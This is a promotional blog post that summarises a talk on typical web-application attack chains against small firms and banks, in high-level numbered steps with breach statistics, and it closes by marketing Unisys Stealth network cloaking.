A few weeks a go I shared with you the joys of Unisys Stealth, a product that was developed for military cloaking of IT that has been reworked for commercial use. Now you might be wondering, why I’m talking about Stealth, when the title of this blog is ‘It’s a Hacker’s Life!”. The hacker cannot hack what he cannot see, so let’s briefly go inside the mind of the hacker to see where he would go if he could see your network.
[easy-tweet tweet=”Learn how hackers breach your networks, and how to prevent it from happening” user=”neilcattermull” hashtags=”cybersec”]
I recently sat through a presentation from Ilia Kolochenko, CEO of High-Tech Bridge SA and I thoroughly enjoyed his explanation of what a hacker does in regards to an enterprise and SME environment. The following is an overview of my favourite parts of his presentation.
To begin, let’s look at some statistics, frighteningly, we are highly vulnerable purely due to our lack of focussed attention when it comes to applications.
[quote_box_center]
“27% of all security breaches at banks in 2014 involved web app attacks” | Verizon
“70% of vulnerabilities exist at the application layer, not network” | Gartner
“4/5 intrusions involved insecure web apps” | Frost & Sullivan and High-Tech Bridge
“74% of respondents consider public-facing web applications as the major threat” | SANS
“30 000 websites are hacked every day to distribute malware” | Sophos Labs
“86% of all websites have at least one serious vulnerability” | WhiteHat Security
“96% of tested applications have vulnerabilities” | Cenzic
[/quote_box_center]
Let’s take a walkthrough of a hackers logical steps when trying/gaining access to your data.
Let’s assume that a hacker is trying to gain access to your network…
Let’s assume that a hacker is trying to gain access to your network – we can follow the steps that they are likely to take. In this scenario we assume a non-sensitive web application attack.
Step 1 – To begin they could Compromise your website, even if it doesn’t have any confidential data on it!
Step 2 – Then they could place an exploit-pack (malware) on one of your website’s pages keeping same design / style in place so you don’t notice the alteration
Step 3 – Moving forward the aim is to contact the victim (your employees, your big clients or partners) via email
Step 4 – Once contact is established, they may send a link to your website by social network or email
Step 5 – Snap! The victim clicks! The vulnerability in your browser or its component is exploited
Step 6 – The victim’s device is now compromised, and a backdoor installed to control the device remotely
Step 7 – From here the attackers could get into your own or your VIP client network, and do all kinds of damage.
Step 8 – The final stages of the attack include the attackers carefully patching your website, to prevent others from hacking it
Step 9 – Then the real kick in the teeth, the attackers can re-sell access to your website on the Dark Web
Amazing hey? Well this is at the lower end of sensitivity so imagine the chain of events at a higher end, say a bank or equivalent. Let’s see how a hacker may gain entry.
Step 1 – Quickly fingerprint IDS/IPS/WAF (if any) to define how to silently bypass them
Step 2 – Compromise one of the web applications, or one of its components
Step 3 – Patch the exploited vulnerability to prevent competing Hackers from getting in
Step 4 – Download all valuable data from your databases
Step 5 – Download your backups and source codes of web applications
Step 6 – Backdoor your web application to get instant and invisible access to it
Step 7 – Try to re-use your IT team passwords to compromise other internal systems
Step 8 – Try to re-use your customer’s passwords to compromise their emails, PayPal, etc
Step 9 – Sell your data on Dark Web and/or blackmail you with demands for ransom
Now you have a firmer idea of a hackers process when accessing your network, forearmed is forewarned as they say.
Many companies turn away from investing in tight security principles and don’t see the inevitable coming. We need to stop knee jerking after the fact and start to be proactive with cyber security! With Cybercrime becoming more lucrative than the drugs trade, the more visible you are the more risk you expose yourself to.
[easy-tweet tweet=”Hackers can’t hack what they can’t see, and luckily with #UnisysStealth we’ve solved this problem”]
Hackers can’t hack what they can’t see, and luckily with Unisys Stealth we really do solve this problem. Cloaking your network using Stealth ensures you are reducing your attack surface and micro-segmenting your network with encrypted communities of interest giving you the best possible protection from hackers allowing you to maintain a more successful, predictable safe network!